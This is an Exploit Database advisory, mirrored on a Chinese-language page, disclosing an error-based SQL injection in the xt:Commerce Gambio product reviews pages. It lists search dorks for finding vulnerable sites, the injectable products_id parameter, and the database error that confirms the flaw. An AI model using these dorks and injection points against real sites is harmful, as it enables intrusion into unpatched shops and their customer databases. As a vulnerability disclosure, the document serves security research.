xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection

• Exploit Database
• 20 阅读

• 作者： secret
  日期： 2010-09-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15039/

•  _____________________/ /_
  / ___/ _ \/ ___/ ___/ _ \/ __/
   (__)__/ /__/ //__/ /_
  /____/\___/\___/_/ \___/\__/
  
  # Exploit Title: xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php"
  # Date: 2010-09-18
  # Author: secret
  # Contact : secret_hf@hotmail.com / ICQ : 17-33-77
  # Site : swissfaking.net/board
  # Software Link: http://www.gambio.de/
  # Version: 2006 - 2008 - 2010 - all versions
  # Tested on: XP / Linux
  
  # Fixed? : NOT FIXED
  
  # Dorks : Gambio inurl:"reviews.php" / Gambio inurl:"product_reviews.php?products_id=" etc...
  
  ##############################################################################################
  
  [ERROR BASED SQL INJECTION]
  
  http://www.xxxxx.com/product_reviews_info.php?products_id=x[SQL INJECTION]
  
  e.g. http://server/product_reviews_info.php?products_id=4[ERROR BASED SQL INECTION]
  e.g. http://server/product_reviews_info.php?products_id=4'
  
  -> xtc_db_error ("select manufacturers_id from products where products_id = 4/'", "1064
  
  ##############################################################################################
  
  [THANKS TO]
  
  ALLAH - الله لا إله لا ايل
  
  To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION